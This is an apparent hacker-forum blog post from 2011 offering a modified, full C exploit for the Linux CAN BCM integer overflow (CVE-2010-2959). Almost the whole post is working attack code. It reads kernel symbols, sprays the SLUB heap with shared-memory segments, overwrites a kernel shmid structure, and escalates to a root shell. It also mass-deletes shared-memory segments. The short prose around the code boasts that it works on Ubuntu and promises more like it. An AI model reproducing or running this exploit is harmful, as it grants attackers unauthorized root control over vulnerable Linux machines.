Help pay for xds lawyer fees.
LR

[OLD] i-can-haz-MODHARDEN.c ~ PF_CAN – Modified/Working version by Admins@CrazyCoders

Posted on 24th November 2011 in Exploits

Now, this is interesting cuzzz… i fund older version ok, now, with qurter-nelson.c ,it seems that is very simple and easy, to trigger ONLY the bad code in the stack buffer overflow in the kernel.. now with this method we have a method wich is made to specially ONLY work, On ubuntu!
Thats the kernel_sym lookup bit.. so, i decided to search for a working version and wala!
I found it, albeit i had to modify and addin a header…still, it now seems to be working GOOD on ubuntu and more!

Have a gig …

/*
* i-CAN-haz-MODHARDEN+fixed-syms.c
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit +getsymbols fix
*
* Info:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/utsname.h>

//#define PAGE_SIZE getpagesize()

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif
#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct {
uint32_t rx_id, tx_id;
} tp;
} can_addr;
};
struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};
struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};
#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
struct list_head *next;
struct list_head *prev;
};
struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;
struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};
struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;
struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;
struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;
struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;
struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;
struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};
struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma) {
commit_creds(prepare_kernel_cred(0));
return -1;
}

unsigned long get_symbol(char *name) { /* borrowed from one of the other codes wich actually, determines OS */
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms","r");
if (f == NULL) {
f = fopen("/proc/ksyms","r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr,sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n",sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to: %p%s ..\n", name,(void *)addr,rep?"(via System.map)":"");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release); // this helps :P
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}

int check_slabinfo(char *cache, int *active_out, int *total_out) {
FILE *fp;
char name[64], slab[256];
int active, total, diff;
memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));
fp = fopen("/proc/slabinfo", "r");
if (!fp) {
printf("[-] Sorry, /proc/slabinfo is not available!");
exit(1);
}
fgets(slab, sizeof(slab) - 1, fp);
while (1) {
fgets(slab, sizeof(slab) - 1, fp);
sscanf(slab, "%s %u %u", name, &active, &total);
diff = total - active;
if (strcmp(name, cache) == 0) {
break;
}
}
fclose(fp);
if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

void trigger(void) {
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;
printf("[+] Creating PF_CAN UDP socket ..\n");
sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf("[-] Kernel lacks CAN packet family support!\n");
exit(1);
}
printf("[+] Connecting PF_CAN socket ..\n");
memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;
ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) {
printf("[-] Couldnt connect CAN socket ..\n");
exit(1);
}
len = MHSIZ + (CFSIZ * (ALLOCATION/16));
msg = malloc(len);
memset(msg, 0, len);
msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;
printf("[+] Clearing out any active OPs via RX_DELETE ..\n");
msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);
printf("[+] Removing any active user owned shmids ..\n");
system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid >/dev/null 2>&1; done;");
printf("[+] Massaging " SLUB " SLUB cache with dummy allocations ..\n");
diff = check_slabinfo(SLUB, &active, &total);
shmids = malloc(sizeof(int) * diff * 10);
cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;
if (diff != 0) {
printf("[-] Inconsistency detected with SLUB cache allocation!\n");
exit(1);
}
printf("[+] Corrupting BCM OP with truncated allocation via RX_SETUP ..\n");
i = base;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf("[-] Kernel rejected malformed CAN header ..\n");
exit(1);
}
i = base + FILLER;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
printf("[+] Mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec ..\n");
mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
//efault = mmap(PAGE_SIZE, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
printf("[+] Mmap'ed mapping of length: %d at: %p ..\n", mmap_len, efault);
printf("[+] Smashing adjacent shmid with dummy payload via malformed RX_SETUP ..\n");
msg = (struct bcm_msg_head *) efault;
memset(msg, 0, mmap_len);
msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldnt trigger EFAULT ,aborting!\n");
exit(1);
}
printf("[+] Seeking out the smashed shmid_kernel ..\n");
i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) {
ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
if (ret == -1 && errno == EIDRM) {
smashed = i;
break;
}
}
if (i == cnt) {
printf("[-] Couldnt find smashed shmid!\n");
exit(1);
}
printf("[+] Discovered our smashed shmid_kernel at: shmid[%d] = %d ..\n", i, shmids[i]);
printf("[+] Re-smashing the shmid_kernel with exploit payload ..\n");
shmid_kernel.shm_perm.seq = shmids[smashed]/IPCMNI;
buf = (char *) msg;
memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));
msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] Couldn't trigger EFAULT ,aborting!\n");
exit(1);
}
ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
printf("[+] Launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
exit(0);
}
printf("[-] Exploit failed!\n");
}

void setup(void) {
printf("[+] Looking for symbols ..\n");
commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] Symbol table not availabe, aborting!\n");
}
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] Symbol table not availabe, aborting!\n");
}
printf("[+] Setting up payload ..\n");
super_block.s_flags = 0;
inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;
dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;
op.mmap = &kernel_code;
op.get_unmapped_area = &kernel_code;
vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;
file.fu_list.prev = &file.fu_list;
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;
shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;
shmid_kernel.shm_file = &file;
}

int main(int argc, char **argv) {
setup();
trigger();
return 0;
}

Yep yep… old but.. hey, theres plenty more like this one…wich can work well with planned out and smart
mmap’ing ;)

xd– #Haxnet/#Haxshells FreeShell service (Yes free)! // Admin

comments: 2 » tags: